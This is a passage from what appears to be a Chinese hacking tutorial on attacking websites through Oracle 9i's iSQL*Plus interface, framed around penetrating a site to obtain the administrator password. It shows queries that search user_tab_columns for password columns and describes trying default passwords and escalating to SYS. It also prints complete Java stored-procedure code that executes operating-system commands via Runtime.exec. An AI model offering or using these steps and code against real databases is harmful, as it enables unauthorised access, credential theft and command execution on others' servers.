|
命令为select * from v$version;
可以很清楚的看到版本为9i
Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
PL/SQL Release 9.2.0.1.0 - Production
CORE 9.2.0.1.0 Production
TNS for 32-bit Windows: Version 9.2.0.1.0 - Production
NLSRTL Version 9.2.0.1.0 - Production
然后再利用select * from tab来--查看当前用户所有的表 每个用户是不同的.
我们渗透一个网站首先考虑的是如何得到管理员的密码. 这个大家可以去看一下剑心的关于jsp+oracle注射的文章 user_tab_columns这个系统表里存放了所有的用户表的列名 所以我们可以直接查询user_tab_columns表里有没有PWD的列名!
其实isqlplus连接之后我们可以做很多的事. 在oracle里sys帐户 就像是mssql下的sa 我们来通过他来提升权限 这里我就不多说了 因为已经有某某同学写过啦 嘿嘿 我再说就有点XX的嫌疑了.
另外isqlplus在提权的时候也可能用上 可以通过查看$ORACLE_HOME/install/portlist.ini 文件可以找到当前的isqlplus application server的监听端口 然后试试默认的密码 连上之后可以通过SYS来达到提权的目的 上次看到一篇文章里说 还有种 可以利用msvcrt.dll调用system()函数执行系统命令 .不晓得哪个牛牛会可以教教偶感谢ing
另外偶在百度了一下发现了个利用ORACLE 执行系统命令的东东
//以下运行在sql window
CREATE OR REPLACE AND compile JAVA SOURCE NAMED Utils AS
import java.io.*;
import java.lang.*;
public class Utils extends Object{
public static int RunThis(String args){
Runtime rt=Runtime.getRuntime();
int rc=-1;
try{
Process p=rt.exec(args);
int bufSize=4096;
BufferedInputStream bis=new BufferedInputStream(p.getInputStream(),bufSize);
int len;
byte buffer[]=new byte[bufSize];
while((len=bis.read(buffer,0,bufSize))!=-1)
System.out.write(buffer,0,len);
rc=p.waitFor();
}catch(Exception e){
e.printStackTrace();
rc=-1;
}
finally{
return rc;
}
}
}
偶们先测试一个
如图4
虽然提示已建立 Java.但是在触发器调用的时候却出错了 不晓得怎么回事 请各位大牛指教哇,就简单说这些..因为没见过有人提到isqlplus所以就废话几句。各位大大别刺激我了. 欢迎喜欢oracle的朋友加偶一起学习..刚接触了点皮毛 呵呵 -_-上一页 [1] [2] [3] |
